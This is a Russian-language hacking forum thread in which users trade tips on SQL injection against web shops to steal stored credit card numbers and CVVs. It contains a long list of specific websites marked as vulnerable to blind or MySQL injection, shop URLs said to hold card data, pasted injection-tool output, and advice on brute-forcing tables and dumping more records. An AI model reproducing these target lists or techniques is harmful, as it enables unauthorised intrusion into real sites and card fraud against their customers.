Делаем сумму без особых усилий

[maximthird]

Dagger линки не актив сделай!!

 

[habrigo]

Вопрос - Когда выбираю Column жму dump now то пишет что к примеру current: 19 но в списке пусто, жму export и в файле только название базы ссылка на сайт и всё. Что делать?

 

[S.W.I.F.T.]

ma231, руками или брутом подбирай название таблиц

 

[ma231]

http://www.redrocktack.com/products.php?subcat=54


http://www.bbtechdirect.com/products.php?subcat=131&cat=54&dept=3
тут базы сс есть но без свв

 

[timonsyz]

дел

 

[SEWERN]

Helper пишет мол версия SQL 4. как ее ломать? большенство шопов с ювелиркой, с этой версией.

догадываюсь что за обвязка стоит ... , но не об этом . 4 Версия не выводится на экран , ее достают с помощью перебора баз/таблиц - типо брут .

 

[ma231]

сейчас попробую.
А как с блайнд инъекциями бороться?

 

[Kusoll]

это все не опасно делать на своем компе ?

 

[SEWERN]

это все не опасно делать на своем компе ?

за тобой уже выехали ...

 

[timonsyz]

кстати разок выбивало типа "Ваш ип был записан как атакующий, приходите ещё"

 

[Kusoll]

а как можно обезопасить себя ?

 

[SEWERN]

а как можно обезопасить себя ?

самый оптимальный вариант это не делать этого . А вобще по секрету - нах не не надо за вами кому то бегать , если захотят то найдут как бы ты не шифровался . Как не печально , но это факт.

 

[GIG]

Автор кэп =/
Тебе повезло просто.

Теперь вопрос на засыпку - кому удалось раскурить шоп на cc кроме TS ?

 

[SEWERN]

Автор кэп =/
Тебе повезло просто.

Теперь вопрос на засыпку - кому удалось раскурить шоп на cc кроме TS ?

Как я уже говорил выше ищите сплойты+баги на сайте , даже если Вы найдете sql то это не означает что там будут СС.

 

[timonsyz]

Теперь вопрос на засыпку - кому удалось раскурить шоп на cc кроме TS ?

мне, а именно моему знакомому, которому показал статью, ибо надо было срочно деньги))

---------- Сообщение добавлено в 19:02 ---------- Предыдущее сообщение размещено в 19:01 ----------

Способ другой, статья послужила только толчком

 

[GIG]

Как я уже говорил выше ищите сплойты+баги на сайте , даже если Вы найдете sql то это не означает что там будут СС.

Спасибо кэп № 2.


PS ухахах сцуко идиоты =/

 

[Kusoll]

ловите может что есть
http://www.beaux-artsbrampton.com/members.php?id='42 (Blind Injection)
http://www.theaterleague.com/theaterContent/Members.php?id='1 (Blind Injection)
http://www.accelerent.com/market/members.php?id='14 (Blind Injection)
http://www.bcanva.com/market/members.php?id='46 (Blind Injection)
http://www.chicagoloopalliance.com/members.php?id='165 (Blind Injection)
http://e-lusion.net/india/members.php?id='all (Blind Injection)
http://fantasticas.odisseias.net/members.php?id='13 (MYSQL Injection)
http://sabores.odisseias.net/members.php?id='17 (MYSQL Injection)
http://futebol.odisseias.net/members.php?id='18 (MYSQL Injection)
http://www.iron.org/chamber/members.php?id='448 (Blind Injection)
http://www.odfalliance.org/members.php?id='5 (MYSQL Injection)
http://www.theatreleague.org/theaterContent/Members.php?id='1 (Blind Injection)
http://www.loffice.org/affiliated-members.php?id='11 (MYSQL Injection)
http://www.grinvi.org/members.php?id='27 (Blind Injection)
http://www.alpacas-waba.org/members.php?id='2 (MYSQL Injection)
http://www.singara.org/members.php?id='5 (MYSQL Injection)
http://www.centrevila.org/members.php?id='109 (Blind Injection)
http://www.saber-riders.de/page/members.php?id='2 (Blind Injection)
http://www.dtkv-duesseldorf.de/members.php?id='25 (MYSQL Injection)
http://www.gracec.info/members.php?id='31 (Blind Injection)
http://www.brew-monkey.com/news.php?id='712 (MYSQL Injection)
http://www.aptima.com/news.php?id='47 (Blind Injection)
http://www.nnovia.com/news.php?id='15 (Blind Injection)
http://www.fairchild-controls.com/about/news.php?id='23 (MYSQL Injection)
http://www.transitionceo.com/news.php?id='7 (Blind Injection)
http://www.neonseven.com/news.php?id='19 (MYSQL Injection)
http://www.labprints.com/website/news.php?id='84 (Blind Injection)
http://www.starfishmedical.com/news.php?id='16&PHPSESSID='c9fbc98caf952954707... (MYSQL Injection)
http://www.barefootwater-ski.com/news.php?id='16 (MYSQL Injection)
http://www.mesquitelocalnews.com/news.php?id='17&t='Business+News (MYSQL Injection)
http://www.cowracommunitynews.com/news.php?id='96&t='COWRA+NEIGHBOURHOOD+CENTRE+NEWS (MYSQL Injection)
http://www.polonia-nova.com/news.php?id='148 (Blind Injection)
http://ifpqatar.com/news.php?id='2931 (MSSQL Injection)
http://southsnews.com/news.php?id='35 (MYSQL Injection)
http://www.garudacompetition.com/news.php?id='40 (Blind Injection)
http://www.arrouwad.com/news.php?id='18807 (MYSQL Injection)
http://qbnz.com/highlighter/news.php?id='123 (MySQL Error Injection and Access)
http://waterdown.magnoliahousespa.com/news.php?id='121 (Blind Injection)
http://www.sinatrafamily.com/news/news.php?id='0 (MYSQL Injection)
http://www.palfi.net/financial-news.php?id='18 (MYSQL Injection)
http://www.boleslawiec24.net/news.php?id='21234&rodzaj='2 (Blind Injection)
http://www.enwell.net/news/news.php?id='2622 (MYSQL Injection)
http://sroda24.net/news.php?id='2201&PHPSESSID='d6daf2655e204ff66839d84817778989 (Blind Injection)
http://www.wroclaw24.net/news.php?id='23777&PHPSESSID='ozyfeqlai (Blind Injection)
http://zgorzelec24.net/news.php?id='11033&PHPSESSID='a7a6b336e3bdd7889e69563403744cfa (Blind Injection)
http://legnica24.net/news.php?id='15794 (Blind Injection)
http://www.legnica24.net/news.php?id='13790&PHPSESSID='fvdymryllwxwp (Blind Injection)
http://www.daawa-info.net/news.php?id='9838 (Blind Injection)
http://www.edcf.net/news.php?id='17 (Blind Injection)
http://www.unitedunderworld.net/news/news.php?id='126 (MYSQL Injection)
http://www.zaglebie24.net/news.php?id='7157&rodzaj='2 (Blind Injection)
http://billiard4u.net/news/news.php?id='18 (MYSQL Injection)
http://www.uktourismpro.net/news.php?id='news (MYSQL Injection)
http://tillanet.net/news.php?id='37&PHPSESSID='f4b2473a6c9de07b243054793b659f49 (MYSQL Injection)
http://naszanysa24.net/news.php?id='19943 (Blind Injection)
http://www.itelite.net/news.php?id='55 (MYSQL Injection)
http://www.pmc-uk.net/my-pmc/news.php?id='17 (Blind Injection)
http://www.lcf.net/news.php?id='6 (Blind Injection)
http://www.soundofart.net/news.php?id='53 (Blind Injection)
http://www.ofvm.org/news.php?id='225 (MYSQL Injection)
http://www.fourcty.org/news.php?id='39&p='7 (MYSQL Injection)
http://www.luimo.org/news.php?id='NE000093 (MYSQL Injection)
http://www.aspirewny.org/about/news.php?id='16 (Blind Injection)
http://www.etc-nepal.org/news.php?id='3 (MYSQL Injection)
http://www.ruig-gian.org/news/news.php?ID='49 (MYSQL Injection)
http://www.resnetnortheast.org/news.php?id='6 (MYSQL Injection)
http://www.cityofcheney.org/news.php?id='101 (Blind Injection)
http://www.belt-wrestling.org/en/news.php?id='4 (Blind Injection)
http://www.democracyjournal.org/news.php?ID='56 (MYSQL Injection)
http://www.iapriweb.org/news.php?id='20 (Blind Injection)
http://www.cac-acc.org/news.php?id='69 (MYSQL Injection)
http://www.isaz.org/news.php?id='28&PHPSESSID='407b99450c0303eb4e937c197b108f56 (MYSQL Injection)
http://deadfall.org/news.php?id='3737 (Blind Injection)
http://www.arthritis.org/chapters/northern-california/news.php?id='204 (MYSQL Injection)
http://www.radworkshere.org/news.php?id='202 (Blind Injection)
http://www.vaceda.org/view-news.php?id='980 (MYSQL Injection)
http://vegasfastener.org/news.php?id='3 (Blind Injection)
http://www.csnsonline.org/news.php?id='35&archive='true (MYSQL Injection)
http://www.richnaba.org/news.php?id='18 (MYSQL Injection)
http://www.chapelstreet.org/news.php?id='520&PHPSESSID='9c7711ee899f7c34e3f0a2114c52dff4 (Blind Injection)
http://www.shelter.org/org/news.php?id='5 (Blind Injection)
http://www.81femmes.org/uk/news.php?id='121 (Blind Injection)
http://www.webwords.org/news.php?id='43 (Blind Injection)
http://www.dvds4vets.org/news.php?id='13 (MYSQL Injection)
http://www.dernewPayPaler.de/news.php?id='118766&i='jdtmnm (Blind Injection)
http://www.ugrap.de/news.php?id='231 (Blind Injection)
http://www.coaching-report.de/news.php?id='350 (MYSQL Injection)
http://www.oabb.de/news.php?id='23 (Blind Injection)
http://www.kanzlei-tmfg.de/news.php?id='60&r='13 (Blind Injection)
http://www.rebecca-online.de/cont_en/news.php?id='64 (MYSQL Injection)
http://cms.nichtbezahlt.de/news.php?id='288 (MYSQL Injection)
http://www.wiiinsider.de/news.php?id='86590 (MYSQL Injection)
http://www.houseedition.de/news.php?id='134 (Blind Injection)
http://www.projekt-verwaltung.de/news.php?id='35&lang='en (Blind Injection)
http://www.atomicforce.de/News.php?ID='32 (MYSQL Injection)
http://www.schlecht-toasten.de/news.php?id='45 (Blind Injection)
http://www.alcatraz-backpacker.de/news.php?id='4&sprache='en (Blind Injection)
http://www.fliessgewaesserbewertung.de/news/news.php?id='23 (Blind Injection)
http://sebastianhomeier.de/news.php?id='2 (Blind Injection)
http://www.hb-people.de/news/news.php?id='2684&rubrik='musik (Blind Injection)
http://www.taxi-heute.de/nachricht/news.php?id='60582 (MYSQL Injection)
http://www.aoe3.de/news.php?id='0&news_id='116 (Blind Injection)
http://www.partnerprogramme.de/news.php?id='50322 (MYSQL Injection)
http://www.row-people.de/news/news.php?id='1446 (Blind Injection)
http://www.scriptworld.de/news.php?id='242 (MYSQL Injection)
http://www.bn-software.de/news/news.php?id='744 (MYSQL Injection)
http://www.parkwood-holdings.co.uk/news.php?id='43 (MYSQL Injection)
http://www.ng2.co.uk/news.php?id='184&newsid='22&date='2006-06-13 (MYSQL Injection)
http://www.ng2nottingham.co.uk/news.php?id='184&newsid='28&date='2008-06-26 (MYSQL Injection)
http://www.dpconnect.co.uk/main/news.php?id='13 (MYSQL Injection)
http://www.falkirkstadium.co.uk/news.php?ID='17 (MYSQL Injection)
http://www.henleystandard.co.uk/news/news.php?id='475639 (MYSQL Injection)
http://www.tagittins.co.uk/news.php?id='1 (MYSQL Injection)
http://www.lichfields.co.uk/news.php?id='280 (MYSQL Injection)
http://www.costadelparadise.co.uk/news.php?id='177 (Blind Injection)
http://www.thehairforce.co.uk/news.php?id='3 (MYSQL Injection)
http://www.beebeedevelopments.co.uk/news.php?id='000019 (MYSQL Injection)
http://www.digitalmischief.co.uk/news.php?id='28 (Blind Injection)
http://www.arkpro.co.uk/news.php?id='3 (MYSQL Injection)
http://www.suwalki.info/news.php?id='4790 (Blind Injection)
http://www.lamarmotte.info/news.php?ID='58 (MYSQL Injection)
http://www.puac.info/News.php?ID='28 (MySQL Error Injection and Access)
http://www.suederelbe.info/news.php?id='9&newsid='403 (Blind Injection)
http://www.maistros.info/htmls/news.php?id='1 (MYSQL Injection)
http://www.yarochester.info/news.php?id='63 (MYSQL Injection)
http://etipack.info/en/communication/news.php?id='15&title='Bema (Blind Injection)

 

[habrigo]

Автор кэп =/
Тебе повезло просто.

Теперь вопрос на засыпку - кому удалось раскурить шоп на cc кроме TS ?

Автор написал основы, а как их использовать дальше решать всем вам.
Некоторым удалось достать CC, просто не все пишут, вот шоп с CC.
http://www.muttugly.com/shop/product.php?id=192

 

[ma231]

sro4no nujen help.
nashel shep s cc i cvv biladres i td. dump delaet tol'ko pervie 100 zapisei a ix tam namnogo bol'she. kak rasshirit' max set kogda dumpuesh?

---------- Сообщение добавлено в 02:02 PM ---------- Предыдущее сообщение размещено в 01:50 PM ----------

i takoi vopros

delau injekt v shop
Get Server Info
Check if URL is Vulnerable
URL is Vulnerable
Check No. of Columns
No. of columns : 10
Check No. of Columns - finished
Looking for larget text visible column
Col num 2 found
Check if supports union
Check if supports union - finished
Check Current user

i dal'she tishina ... pishet error 10060 coudnt connect through proxy server
4to delat'?

---------- Сообщение добавлено в 03:50 PM ---------- Предыдущее сообщение размещено в 02:02 PM ----------

i tak eshe:
MySQl ver 4 udalos' brutom vivest' tables , v stroke order jmu get column tak je brutom na4inaet perebirat', i viju takie stro4ki kak cctype, cc, cvv, i td, tol'ko oni ne vivodyatsya v okne columns . mogno ix kaknibud' rukami dostat'?

 

[Apokalepsys]

Зайди просто в phpmyadmin и прямо от туда ливай а не через программу.